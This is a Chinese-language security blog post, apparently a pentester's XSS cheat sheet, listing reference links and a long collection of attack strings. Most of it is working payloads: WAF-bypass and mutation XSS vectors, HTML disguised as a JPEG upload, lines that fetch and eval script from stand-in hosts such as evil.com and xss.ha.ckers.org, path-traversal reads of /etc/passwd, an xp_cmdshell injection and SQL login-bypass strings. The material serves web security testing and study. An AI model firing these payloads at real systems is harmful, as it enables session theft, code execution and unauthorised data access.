Neurohazard
暮雲煙月,皓首窮經;森羅萬象,如是我聞。

常见 XSS 测试代码

wpadmin~August 10, 2018 /InfoSec

Contents

常见 XSS 测试代码

XSS 核心参考资料

burp cheat sheet
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

WAPTXv2 课程与 SANS 的类似
104_XSS_Filter_Evasion_And_WAF_Bypassing.pdf

Bypassing-XSS-detection-mechanisms (XSStrike 作者)
https://github.com/s0md3v/MyPapers/tree/master/Bypassing-XSS-detection-mechanisms

OWASP XSS cheat sheet
https://owasp.org/www-community/xss-filter-evasion-cheatsheet

所有 on event 事件
https://www.tutorialrepublic.com/html-reference/html5-event-attributes.php

反射点

手动测试

# 优先闭合 textarea 
# 如果 img 在 textarea 内,无法弹窗

</textarea><iMg/sRc=1 oneRror=conFiRm(1)>
</textarea><iMg/sRc=1 oneRror=proMpt(1)>

# Chrome 73 测试
# conFIRm(1) 函数无法弹窗 confirm 可以弹窗
<dEtAils/oPeN/oNTogGLe=pROMpt(1)>
<dEtAils/oPeN/oNTogGLe=confirm(1)>
<details/open/ontoggle=confirm`1`>
# waf 绕过
1
self[["aler","t"].join("")](document.cookie)
2
[1].find(alert)
3
<img/sRc/onErrOr=(1,alert)(1)
x%3Cscript%3E(1,alert)(1)%3C/script%3E
4
四叶草 继承链
5
<script>alert`1`</script%20sdhjahaj%20>
6
proofwithiframe%3Ciframe%20srcdoc=%22%26%2360%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2362%3B%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%26%2340%3B%26%2349%3B%26%2341%3B%26%2360%3B%26%2347%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2362%3B%22%3E
7
x<svg><script>%26%2397%3Blert(1)</script>
8 mutation xss

<noscript><p title="</noscript><img src=x onerror=alert(1)>">
标签优先级问题 google 首页 XSS 分析
Mutation XSS in Google Search
https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/



# svg 图片
<svg/onload=alert(1)//

# 调换一下顺序
<img/src/onerror=alert`1`>
# 配合逗号表达式可过 waf
# 还有一种 继承链调用的 payload
<img/sRc/onErrOr=(1,alert)(1)
<img/onError=alert(1) src=1//
" onwheel=confirm`1` "


# HTML5 低频事件
<x oncopy=y=prompt,y``>z
<x onpaste=y=prompt,y``>z
<details open ontoggle=[1].find(alert)>
<select autofocus onfocus=[2].find(alert)>
<input autofocus onfocus=s=createElement("scriPt");body.appendChild(s);s.src="//xss.xx/1te">
# https://xz.aliyun.com/t/6786

# 只有部分浏览器支持 且 需要点击交互
<p><i/onlick=alert(1) /></p>
<p>He named his car <i/onclick="alert(1)">lightning</i>, because it was very fast.</p>

 55个字符 为 innerhtml 赋值 能不能做到任意执行命令
例如 document.body.innerHTML="<img src/onerror='fetch`//evil.com/1.js`.then(r=>r.text()).then(eval)'>"

<svg onload=import('//evil.com/1.js')>

可以绕过 Akamai waf
注意其中加号表示空格
FIREFOX 支持 chrome 不支持

值得关注的是 marquee 这个标签很特别,是一个废弃的标签,却仍然被少量浏览器支持。

Tested: Akamai waf bypass
加号版
<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>
正常版
<marquee loop=1 width=0 onfinish='new Function`al\ert\`1\``'>
Got stored xss chaining csrf

一组 payload
https://github.com/TheKingOfDuck/easyXssPayload
https://github.com/BLKStone/easyXssPayload

上传点 XSS

在 OSS 的某些特殊配置下, 可能 Content-Type 限制设置不严格。
浏览器会先把文件作为图片解析,如果失败就降级成 HTML 来解析,造成类似于 存储型 XSS 的效果。
因此,形如 https://oss.example.com/20190501/picture1.jpg 的 URL 也能执行 JavaScript。
因此可以在 上传的 HTTP 请求的 multipart body 中使用如下操作

Content-Disposition: form-data; name="file"; filename="picture1.jpg"
Content-Type: image/jpeg

<html>
<script>alert(1);</script>
</html>

jpg 不能作为 html 执行的话,可以试试把文件名改成 picture1.html

编辑器 XSS

1 上传图片
2 插入超链接

插入超链接触发 XSS 的案例

http://<? foo="><iframe/onload='this["src"]="javas   cript:al"+"ert`123`"';>

其他 payload

可以配合 XssSniper 使用

测试代码

'><script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<script>alert('XSS')</script>
<img src="javascript:alert('XSS')">
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<script>alert('Vulnerable');</script>
<script>alert('Vulnerable')</script>
?sql_debug=1
a%5c.aspx
a.jsp/<script>alert('Vulnerable')</script>
a/
a?<script>alert('Vulnerable')</script>
"><script>alert('Vulnerable')</script>
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
'';!--"<XSS>=&{()}
<IMG src="javascript:alert('XSS');">
<IMG src=javascript:alert('XSS')>
<IMG src=JaVaScRiPt:alert('XSS')>
<IMG src=JaVaScRiPt:alert("XSS")>
<IMG src=javascript:alert('XSS')>
<IMG src=javascript:alert('XSS')>
<IMG src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG src="jav ascript:alert('XSS');">
<IMG src="jav ascript:alert('XSS');">
<IMG src="jav ascript:alert('XSS');">
"<IMG src=java\0script:alert(\"XSS\")>";' > out
<IMG src=" javascript:alert('XSS');">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<BGSOUND src="javascript:alert('XSS');">
<br size="&{alert('XSS')}">
<LAYER src="http://xss.ha.ckers.org/a.js"></layer>
<LINK REL="stylesheet" href="javascript:alert('XSS');">
<IMG src='vbscript:msgbox("XSS")'>
<IMG src="mocha:[code]">
<IMG src="livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<IFRAME src=javascript:alert('XSS')></IFRAME>
<FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE='xss:expre\ssion(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<BASE href="javascript:alert('XSS');//">
getURL("javascript:alert('XSS')")
a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
<XML src="javascript:alert('XSS');">
"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
<SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
<IMG src="javascript:alert('XSS')"
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->
<IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<A href=http://www.gohttp://www.google.com/ogle.com/>link</A>
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a[/code]

Leave a Reply

Your email address will not be published. Required fields are marked *